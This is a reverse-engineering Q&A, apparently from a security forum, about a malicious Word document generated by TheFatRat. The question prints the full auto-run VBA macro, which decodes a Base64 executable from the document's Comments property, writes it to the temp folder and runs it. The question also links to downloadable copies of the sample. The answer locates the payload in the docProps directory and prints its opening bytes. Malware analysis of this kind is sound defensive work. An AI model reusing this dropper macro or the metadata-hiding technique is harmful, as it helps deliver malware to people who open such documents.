# Where is Base64 code in TheFatRat Microsoft reverse shell document?

Tags: vba, ms-word, base64, reverse-engineering, ole

I've created a reverse shell Microsoft Word document with [TheFatRat](https://github.com/Screetsec/TheFatRat) which mostly creates reverse shells!

[image]

Now , I want to reverse engineer it, So I brought up the [REMNUX](https://remnux.org/)(Ubuntu with some reverse engineering tools).

I've used oledump.py and the output is :

```
remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'
```

The A3 section has these macro:

**remnux@remnux:~$ oledump.py kjbk.docm -v(decompress) -s A3**

```
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function
```

It obviously decodes some Base64 code and run it, the problem is ,I can't find any Base64(reverse shell code) on this file on any of those A1...A6 parts. So where is the reverse shell code resides?

I've uploaded the file to these locations, password is 123, and it creates reverse shell to local network(192.168....) so it is quit harmless.

[Link1](https://uploadfiles.net/9pg/kjbk.docm.zip), [Link2](https://gofile.io/d/IqK27w) , [Link3](https://urlupload.com/89f05483f54f0acd)

Answer (score 0, accepted):

Lets answer it before I forget, I bet the TheFatRat developer is not happy for this analysis but I found the revers shell code.

Unlike the Emotet malware the Base64 code is not detectable by tools like oledump(which only looks at word directory of the infected document) and it would not hide in the main document XML file, I did open the Microsoft Word file with Ubuntu Archive Manager and voilà:

[image]

The executable file is hiding in the docProps directory! It is Base64 and it contains reverse shell code! which will copy to Windows temp folder.

First lines of it:

```
<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA
```